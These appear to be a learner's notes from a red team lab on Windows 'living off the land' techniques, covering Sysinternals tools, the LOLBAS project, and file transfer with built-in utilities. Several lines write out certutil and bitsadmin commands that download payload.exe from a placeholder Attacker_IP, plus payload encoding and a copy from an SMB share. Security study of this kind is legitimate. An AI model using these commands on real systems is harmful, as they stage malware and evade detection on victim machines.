Living off the land - use what is given - built-in tools and utilities
-recon
-file ops
-arbitrary code exe
-lateral movement
-security product bypass

---------------------------------------------------------------------------------------------------------------------------------------------------------------

Windows Sysinternals
-set of tools and advanced sys utilities
-manage, troubleshoot, diagnose
-accept microsoft license agreement to use tools
use command: -accepteula

AccessChk: help admins check specified access for files, dir, reg keys, global obj, win serv
PsExec: executes programs on remote system
ADExplorer: AD tool to help view and manage AD database
ProcDump: monitor running processes for CPU spikes and dump memory for analysis
ProcMon: process monitoring
TCPView: lists all TCP and UDP connections
PsTools: list detailed info
Portmon: monitor serial and parallel port activity
Whois: info for a specified domain name or IP

-access Sysinternals: web, windows share, command prompt

C:\Users\thm> C:\Tools\SysinternalsSuite\PsExec64.exe

Red Team = useful because they are trusted by OS
-tools useful for evading detection

------------------------------------------------------------------------------------------------------------------------------------------------------------------

LOLBAS

Living off the Land Binaries And Scripts - community driven repository gathering a collection of binaries, scripts, libraries that could be used for red team purposes

https://lolbas-project.github.io/

----------------------------------------------------------------------------------------------------------------------------------------------------------------

File Operations

Certutil:
built-in utility for managing certification services
-used to dump and display Certification Authority (CA)
-can encode and transfer files unrelated to certification - Ingress Tool Transfer (T1105)
-using split technique download file from URL
certutil -URLcache -split -f http://Attacker_IP/payload.exe C:\Windows\Temp\payload.exe
-used for eecoding
C:\Users\thm> certutil -encode payload.exe Encoded-payload.txt

BITSAdmin:
sys admin utility that can be used to create, download, or upload BITS (background intelligent transfer service)
-low-bandwidth and asynchronous method to download and upload files from HTTP webservers and SMB servers
-abused to download and execute malicious payload (T1197)
C:\Users\thm>bitsadmin.exe /transfer /Download /priority Foreground http://Attacker_IP/payload.exe c:\Users\thm\Desktop\payload.exe

FindStr:
find text and string patterns in files
-can be used to download remote files from SMB shared folders
C:\Users\thm>findstr /V dummystring \\MachineName\ShareFolder\test.exe > c:\Windows\Temp\test.exe

bitsadmin /transfer /Download /priority Foregraound http://[IP]/file
enc_thm_0ymFiOG_file.txt

